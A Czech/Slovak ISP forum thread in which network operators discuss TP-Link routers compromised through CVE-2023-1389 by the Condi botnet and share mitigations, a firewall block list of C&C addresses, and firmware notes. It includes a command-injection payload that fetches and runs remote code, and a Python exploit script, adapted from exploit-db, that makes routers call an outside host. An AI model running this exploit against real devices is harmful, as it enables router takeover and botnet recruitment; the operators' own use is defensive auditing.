• Hardware

  • Zranitelnost v routerech TP-Link (CVE-2023-1389)

miract

Jsem se možná špatně vyjádřil. Ten string mi vrátí jakákoliv C6, i nenapadená.

U EX a EC modelů mi vrátí nějakou chybu 403, 500 atd... Ale teda musím říct, že tyto modely jsem u nás zatím napadené neviděl. Vše co jsme měli bylo C6, AX23, AX50.

TP-link co se týče zranitelných modelů zatím neodpověděl.

    miract
    to má být soubor s obsahem toho POSTu

    z toho se snažím spustit ten kód, to mi teda nejde
    operation=write&country=$(id>wget <NECO KE STAZENI> -O-|sh)

      jnikles
      podle toho co jsem vysledoval, tak update FW opravdu ničemu nepomůže, ovšem napadeny jsou podle všeho jen routery, které mají remote control IP adresu neomezenou. Ty, které mají specifickou IP zatím vypadají útokem nezasaženy.

        @jihi děkuji, jeden for do bashe a prošel jsem všechny veřejky u nás za minutku a dobrý. Všechny se chovají jak mají až na jeden novej archer C6 😅 ... workaround kolem toho byla změna povolené remote ip a tím se to tomu curlu zavřelo

        zda se, ze ISP verze s agile firmware jsou v pohode, problem maji retailove verze.

        import requests, urllib.parse, argparse
parser = argparse.ArgumentParser()

parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
parser.add_argument("-id", "--id", dest = "id", default = "1234", help="id for callback")

args = parser.parse_args()

revshell = urllib.parse.quote("wget http://MUJ.WEB/index.php?clbk=" + args.id);
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"


r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)

        Tohle je ještě kus pythonu vybrakovany odsud https://www.exploit-db.com/exploits/51677
        Tohle mi už spouští kód na AX23,20 a 50
        Mám tam zadaný wget na vlastní web kde si loguji přístupy dle toho "id" ktere se zadava. Asi dobrý postup je pustit ten curl na všechny IP a ty kde vrati ten string "data" ještě prozkoumat tímto pythonem.
        Odhaduju, že útok na C6ky bude trochu jiný, ale dle chování myslím, že je také přes mng. vystavený do internetu.

        jcltm toto mi ani nehovor, ked bola diskusia o tarifoch tak z polky ludi tu vypadlo ze robia net za 300kc, klientela za 300kc si isto nekupi wifinu za 2500kc a viac.

          Vím, že to není pro každého a kór u vás v tom velkým množství, ale já mám rád OpenWrt. Tp-Link měl i v nových fw hloupé chyby, že router neudržel Prefix delegation a podobné chyby... po přechodu na OpenWrt je to luxusní zařízení za pár kaček.

          TP-Link Archer C6 v2: https://openwrt.org/toh/tp-link/archer_c6_v2
          TP-Link Archer C6 v3: https://openwrt.org/toh/tp-link/archer_c6_v3

          V podstatě o tom nevím dělá to co má. Pravidelné aktualizace. Ano nejsou podporována všechna zařízení.

          jcltm Vysvetlit to nie je problem, problem je, ze ti ludia to bud neakceptuju, alebo tomu neveria. Vacsinou sa takato diskusia konci "ale ved to musi stacit" my aj tak nemame rychly internet 🙄. Nechapu, ze to s tym nesuvisi, ze to stacit nebude, ked sa na to doma vsetci pripoja. Ked si k nam ludia pridu kupit novy router, oci im okamzite padnu na tie za 20€ a tazko sa lamu na drahsie. "Priplatia" (aj ked z mojho pohladu, kupuju na dnesnu dobu standard) si len ti, ktori prichadzaju s poziadavkou "potrebujeme silnejsi wifi signal". S tymi sa uz da diskutovat a nechaju si vysvetlit ako to funguje.

            U nas to kontroluje pres src 9511, z flowmonu jsem vytahl nejakych 5ks IP controlleru a zahodil. Uvidime jak rychle se to preprogramuje 🙂

            ip firewall address-list
add address=159.65.27.199 list=Condi-DDoS-Botnet-controllers
add address=167.172.160.146 list=Condi-DDoS-Botnet-controllers
add address=170.64.150.59 list=Condi-DDoS-Botnet-controllers
add address=64.227.129.12 list=Condi-DDoS-Botnet-controllers
add address=79.110.48.149 list=Condi-DDoS-Botnet-controllers

/ip firewall filter
add action=drop chain=forward protocol=tcp src-address-list=Condi-DDoS-Botnet-controllers src-port=9511
            • JanK replied to this.

              johnyboi
              Muzete nekdo dalsi, kdo ma tez nejake infikovane TP-LINKy v siti, potvrdit, ze komunikace s C&C botnetu Condi probiha z portu 9511? Obavam, ze ze ten port bude volen nahodne.

                  Na Archer C6 vyšla aktualizace. Máte někdo prosím info jestli opravuje tuhle chybu?

                    My máme těchto routerů na veřejkách hadám tak stovky ks ale nepozoruji žádný problém. Není to tím že mám webmanagement na jiném než default portu a tento port blokovaný v celé síti z internetu dovnitř na centrálním routeru ?

                    Vypozoroval jsem, že je zranitelnost pouze u novějších routeru, které mají management na WAN portu přes https(z http se dělá redirect na https).

                    Můžete mi prosím tuto domněnku někdo vyvrátit? Děkuji.

                      Když už si uděláte remote shell do zákazníkova zařízení, tak lze spoustit wget nového firmware a sysupgrade.
                      U routerů AX10 je od června dostupný firmware, který to fixuje (1.3.8 a nověji i 1.3.9). Na AX20 má vyjít každým dnem.

                      miract ja mam HTTP na 8181 ktery je vyblokovany zvenku do naší sítě a https na default portu a remote povoleny pouze z jedne ip adresy a zatim se mi to neděje

                        miract
                        Samozřejmě pro útočníka je složitější najít router, co má zakázaný ping na WAN a management na jiném portu a nejspíš to dělat nebude, ale spolehnout se na to nedá. Máme i zákazníka, u nějž to aktivoval malware z vnitřní sítě, protože venkovní management měl vypnutý. A taky máme infikovaný router, kterému běžel remote management na 8080 a 8443. Takže často používané porty asi v bezpečí úplně nejsou.

                          📡 Telekomunikace.cz